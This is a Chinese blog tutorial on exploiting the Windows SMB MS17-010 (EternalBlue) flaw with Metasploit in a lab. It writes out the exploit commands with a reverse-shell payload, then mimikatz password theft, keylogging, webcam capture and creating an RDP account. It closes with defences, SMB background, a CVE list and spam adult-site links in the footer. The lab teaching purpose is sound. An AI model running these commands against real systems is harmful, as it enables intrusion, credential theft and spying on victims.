<kbd id="afajh"><form id="afajh"></form></kbd>
<strong id="afajh"><dl id="afajh"></dl></strong>
    <del id="afajh"><form id="afajh"></form></del>
        1. <th id="afajh"><progress id="afajh"></progress></th>
          <b id="afajh"><abbr id="afajh"></abbr></b>
          <th id="afajh"><progress id="afajh"></progress></th>

          Windows-smb漏洞利用介紹

          共 5514字,需瀏覽 12分鐘

           ·

          2021-08-03 15:28

          作者:Evan 編輯:白帽子社區(qū)運(yùn)營團(tuán)隊(duì)




              "白帽子社區(qū)在線CTF靶場BMZCTF,歡迎各位在這里練習(xí)、學(xué)習(xí),BMZCTF全身心為網(wǎng)絡(luò)安全賽手提供優(yōu)質(zhì)學(xué)習(xí)環(huán)境,鏈接(http://www.bmzclub.cn/)

          "    






          1、metasploit介紹


          ------Metasploit是一款開源的安全漏洞檢測工具,可以幫助安全和IT專業(yè)人士識別安全性問題,驗(yàn)證漏洞的緩解措施,并管理專家驅(qū)動的安全性進(jìn)行評估,提供真正的安全風(fēng)險(xiǎn)情報(bào)。這些功能包括智能開發(fā),代碼審計(jì),Web應(yīng)用程序掃描,社會工程。團(tuán)隊(duì)合作,在Metasploit和綜合報(bào)告提出了他們的發(fā)現(xiàn)。
          ------Metasploit是一個(gè)免費(fèi)的、可下載的框架,通過它可以很容易地獲取、開發(fā)并對計(jì)算機(jī)軟件漏洞實(shí)施攻擊。它本身附帶數(shù)百個(gè)已知軟件漏洞的專業(yè)級漏洞攻擊工具。當(dāng)H.D. Moore2003年發(fā)布Metasploit時(shí),計(jì)算機(jī)安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個(gè)人都可以使用攻擊工具來攻擊那些未打過補(bǔ)丁或者剛剛打過補(bǔ)丁的漏洞。軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補(bǔ)丁了,這是因?yàn)?span style="font-size: 15px;font-family: Calibri;">Metasploit團(tuán)隊(duì)一直都在努力開發(fā)各種攻擊工具,并將它們貢獻(xiàn)給所有Metasploit用戶。(摘錄自百度百科)

          2、MS17-010漏洞介紹



          ------MS17-010是一個(gè)安全類型的補(bǔ)丁,用來修補(bǔ)Windows操作系統(tǒng)中存在的一個(gè)基于SMB服務(wù)展現(xiàn)出來的一個(gè)漏洞,此漏洞利用445端口執(zhí)行,原本是作為局域網(wǎng)共享使用的一個(gè)端口,但惡意人員可以利用此端口偷偷的執(zhí)行共享服務(wù)或者其他命令執(zhí)行操作。此MS17-0101漏洞主要是針對于Windows7及以前的操作系統(tǒng)暴露出來的安全問題。

          3、漏洞利用環(huán)境介紹



          kali:作為執(zhí)行漏洞利用的主機(jī),默認(rèn)上面安裝了metasploit安全漏洞檢測工具,IP192.168.1.8。
          windows7:作為靶機(jī)使用,模擬被攻擊者,IP192.168.1.10
          windows 2008:作為靶機(jī)使用,模擬被攻擊者,IP192.168.1.15

          4、實(shí)施過程:


          此時(shí)發(fā)現(xiàn)IP地址已經(jīng)配置好了:

          首先進(jìn)入平臺點(diǎn)擊環(huán)境申請,進(jìn)入kali系統(tǒng)發(fā)現(xiàn)eth0未啟用:

          此時(shí)網(wǎng)絡(luò)已經(jīng)設(shè)置好了:

          使用ping命令發(fā)現(xiàn)網(wǎng)絡(luò)是通的:

          kali當(dāng)中啟動metasploit工具,通過msfconsole指令進(jìn)行啟動

          Search命令搜索ms17-010漏洞掃描模塊,圖中圈中的就是漏洞掃描模塊。執(zhí)行:search  ms17-010 //搜索ms17-010相關(guān)漏洞利用模塊

          msf > use auxiliary/scanner/smb/smb_ms17_010 (利用模塊該掃描模塊并且設(shè)置相關(guān)掃描范圍信息)。執(zhí)行:use auxiliary/scanner/smb/smb_ms17_010 //選擇使用該模塊執(zhí)行搜索選項(xiàng)set rhosts 192.168.1.0/24 //設(shè)置掃描的網(wǎng)段范圍set threads 50 //設(shè)置掃描的線程,數(shù)值越大掃描速度越快run //開始運(yùn)行即開始執(zhí)行掃描

          執(zhí)行掃描過后,結(jié)果如下所示,從結(jié)果中可以看到在當(dāng)前掃描的網(wǎng)段中存在一個(gè)windows 20087版本的操作系統(tǒng)存在ms17-010漏洞

          接下來進(jìn)行漏洞利用過程即可,執(zhí)行:use exploit/windows/smb/ms17_010_eternalblue //選擇漏洞利用模塊set payload windows/x64/meterpreter/reverse_tcp //設(shè)置漏洞利用完成后的反彈模塊,用以接收回饋信息set lhost 192.168.1.8 //設(shè)置反彈IP地址set lport 6666 //設(shè)置反彈端口set rhost 192.168.1.15 //設(shè)置被攻擊的目標(biāo)主機(jī)

          show options //檢查設(shè)定的信息

          exploit //開始進(jìn)行漏洞利用

          到這里即顯示漏洞利用已成功。

          查看IP地址、查看進(jìn)程信息

          查看進(jìn)程信息:

          獲取密碼,執(zhí)行:load mimikatz //加載獲取密碼的模塊msv //利用mimikatz的msv獲取密文hashKerberos //獲取明文密碼*****

          上傳文件

          kali根目錄下創(chuàng)建了一個(gè)aaa.exe的文件,將其上傳至目標(biāo)操作系統(tǒng)當(dāng)中C盤下。upload  /aaa.exe  c://

          上傳之前的C盤:

          上傳之后:


          拓展:

          1. execute -f test.txt //執(zhí)行該文件,如是木馬文件即可成功執(zhí)行并觸發(fā)

          2. 截取目標(biāo)屏幕快照screenshot可以看到圖片以及在root目錄下面,直接下載查看

          3. 鍵盤記錄run post/windows/capture/keylog_recorder //運(yùn)行鍵盤記錄器,用戶打開記事本開始寫文本,得到結(jié)果

          4. 調(diào)用目標(biāo)系統(tǒng)攝像頭webcam_list //查看目標(biāo)攝像頭設(shè)備列表webcam_chat //開啟攝像頭錄像webcam_snap //開啟攝像頭拍照webcam_stream //開啟攝像頭直播


          5、開啟目標(biāo)遠(yuǎn)程


          開啟目標(biāo)遠(yuǎn)程,并創(chuàng)建一個(gè)test帳戶:

          meterpreter > run post/windows/manage/enable_rdp username="test" password="123456"

          使用剛才創(chuàng)建的用戶和密碼進(jìn)行遠(yuǎn)程,進(jìn)行遠(yuǎn)程控制:

          root@kali:~# rdesktop 192.168.10.105 -u test -p 123456


          6、防范措施


          關(guān)閉445等高危端口

          配置防火墻,安裝防護(hù)軟件

          安裝補(bǔ)丁


          7、基礎(chǔ)知識介紹


          何為永恒之藍(lán)?

          永恒之藍(lán)(Eternal Blue)爆發(fā)于2017414日晚,是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來獲取系統(tǒng)的最高權(quán)限,以此來控制被入侵的計(jì)算機(jī)。甚至于2017512日, 不法分子通過改造永恒之藍(lán)制作了wannacry勒索病毒,使全世界大范圍內(nèi)遭受了該勒索病毒,甚至波及到學(xué)校、大型企業(yè)、政府等機(jī)構(gòu),只能通過支付高額的贖金才能恢復(fù)出文件。不過在該病毒出來不久就被微軟通過打補(bǔ)丁修復(fù)。

          什么是SMB協(xié)議?

          SMB(全稱是Server Message Block)是一個(gè)協(xié)議服務(wù)器信息塊,它是一種客戶機(jī)/服務(wù)器、請求/響應(yīng)協(xié)議,通過SMB協(xié)議可以在計(jì)算機(jī)間共享文件、打印機(jī)、命名管道等資源,電腦上的網(wǎng)上鄰居就是靠SMB實(shí)現(xiàn)的;SMB協(xié)議工作在應(yīng)用層和會話層,可以用在TCP/IP協(xié)議之上,SMB使用TCP139端口和TCP445端口。

          SMB工作原理是什么?

          1):首先客戶端發(fā)送一個(gè)SMB negport 請求數(shù)據(jù)報(bào),,并列出它所支持的所有SMB的協(xié)議版本。服務(wù)器收到請求消息后響應(yīng)請求,并列出希望使用的SMB協(xié)議版本。如果沒有可以使用的協(xié)議版本則返回0XFFFFH,結(jié)束通信。

            2):協(xié)議確定后,客戶端進(jìn)程向服務(wù)器發(fā)起一個(gè)用戶或共享的認(rèn)證,這個(gè)過程是通過發(fā)送SessetupX請求數(shù)據(jù)包實(shí)現(xiàn)的??蛻舳税l(fā)送一對用戶名和密碼或一個(gè)簡單密碼到服務(wù)器,然后通過服務(wù)器發(fā)送一個(gè)SessetupX應(yīng)答數(shù)據(jù)包來允許或拒絕本次連接。

            3):當(dāng)客戶端和服務(wù)器完成了磋商和認(rèn)證之后,它會發(fā)送一個(gè)TconTconX SMB數(shù)據(jù)報(bào)并列出它想訪問的網(wǎng)絡(luò)資源的名稱,之后會發(fā)送一個(gè)TconX應(yīng)答數(shù)據(jù)報(bào)以表示此次連接是否接收或拒絕。

          (4):連接到相應(yīng)資源后,SMB客戶端就能夠通過open SMB打開一個(gè)文件,通過read SMB讀取文件,通過write SMB寫入文件,通過close SMB關(guān)閉文件。</font>

           

          雖然這個(gè)漏洞是比較早期的,但是非常適合新手訓(xùn)練,引領(lǐng)入門;現(xiàn)在很多的服務(wù)有的還是搭建在這個(gè)系統(tǒng)上,危害性還是比較高,引起重視為好,個(gè)人建議如危險(xiǎn)常見端口、插件等最好不要暴露出來,再增加WAF、防火墻、入侵檢測等防護(hù)措施。


          列舉最近新的漏洞如下:

          漏洞名稱                                   

          CVE編號

          4images 跨站腳本漏洞

          CVE-2021-27308

          Puppet Discovery 安全漏洞

          CVE-2018-11747

           Sundray WLAN Controller 命令注入漏洞

          CVE-2019-9161

          Nginx 安全漏洞

          CVE-2018-16844

           ZZCMS SQL注入漏洞

          CVE-2018-1000653

          Mitsubishi Electric GOT2000 安全漏洞

          CVE-2021-20592

          Veyon Service 安全漏洞

          CVE-2020-15261

          ELECOM 多款產(chǎn)品安全漏洞

          CVE-2021-20738

          Linux kernel 安全漏洞

          CVE-2021-35039

          WordPress 訪問控制錯(cuò)誤漏洞

          CVE-2021-34626

          just-safe-set 安全漏洞

          CVE-2021-25952

          Google Android信息泄露漏洞

          CVE-2021-0597

          Software License Manager 跨站請求偽造漏洞

          CVE-2021-20782

          WordPress 跨站請求偽造漏洞

          CVE-2021-20781

          MDT AutoSave代碼問題漏洞

          CVE-2021-32961

          Google Android 安全漏洞

          CVE-2021-31816

          Octopus Server 安全漏洞

          CVE-2021-31817

          Mikrotik RouterOs 安全漏洞

          CVE-2020-20217

          PrusaSlicer 安全漏洞

          CVE-2020-28598

          MDT AutoSave加密問題漏洞

          CVE-2021-32945

          Eclipse TinyDTLS 安全特征問題漏洞

          CVE-2021-34430

          QEMU 安全漏洞

          CVE-2021-3638

          Aruba ClearPass Policy Manager 安全漏洞

          CVE-2021-34614

          Elasticsearch 安全漏洞

          CVE-2021-22144

          Fortinet FortiManager 安全漏洞

          CVE-2021-24022

          Allen Bradley Micrologix 1100輸入驗(yàn)證錯(cuò)誤漏洞

          CVE-2021-33012

          Google Android 安全漏洞

          CVE-2021-0592

          Cisco Video Surveillance 7000 Series IP Cameras 安全漏洞

          CVE-2021-1598

          IBM InfoSphere Information Server 跨站腳本漏洞

          CVE-2021-29712

          Samsung Members 信息泄露漏洞

          CVE-2021-25432

          Samsung Tizen安全漏洞

          CVE-2021-25433

          Samsung Mobile Device Cameralyzer 訪問控制錯(cuò)誤漏洞

          CVE-2021-25431

          Samsung Tizen 代碼注入漏洞

          CVE-2021-25434

          MDT AutoSave 路徑遍歷漏洞

          CVE-2021-32949

          Samsung Tizen代碼注入漏洞

          CVE-2021-25435

          Samsung Tizen代碼注入漏洞

          CVE-2021-25436

          Samsung Tizen代碼注入漏洞

          CVE-2021-25437

          Samsung Members訪問控制錯(cuò)誤漏洞

          CVE-2021-25438

          Samsung Members 訪問控制錯(cuò)誤漏洞

          CVE-2021-25439

          Samsung Mobile FactoryCameraFB 訪問控制錯(cuò)誤漏洞

          CVE-2021-25440

          Bluetooth 授權(quán)問題漏洞

          CVE-2021-25430

          Samsung Mobile AR Emoji Editor 輸入驗(yàn)證錯(cuò)誤漏洞

          CVE-2021-25441

          IBM InfoSphere Information Server 安全漏洞

          CVE-2021-29730

          Samsung KCS安全漏洞

          CVE-2021-25442




          往期精彩文章




          域環(huán)境下的賬號hash獲取以及hash傳遞
          F5 BIG-IP & Node-RED漏洞復(fù)現(xiàn)集合
          Apereo CAS 4.1 反序列化命令執(zhí)行漏洞復(fù)現(xiàn)
          友點(diǎn)CMS GETSHELL





          技術(shù)支持:白帽子社區(qū)團(tuán)隊(duì)
          — 掃碼關(guān)注我們 



          瀏覽 171
          點(diǎn)贊
          評論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          評論
          圖片
          表情
          推薦
          點(diǎn)贊
          評論
          收藏
          分享

          手機(jī)掃一掃分享

          分享
          舉報(bào)
          <kbd id="afajh"><form id="afajh"></form></kbd>
          <strong id="afajh"><dl id="afajh"></dl></strong>
            <del id="afajh"><form id="afajh"></form></del>
                1. <th id="afajh"><progress id="afajh"></progress></th>
                  <b id="afajh"><abbr id="afajh"></abbr></b>
                  <th id="afajh"><progress id="afajh"></progress></th>
                  老司机午夜影院 | 精品人妻午夜一区二区三区四区 | 五月深深爱亭亭 | www.色综合 | 日韩一区二区视频在线观看 |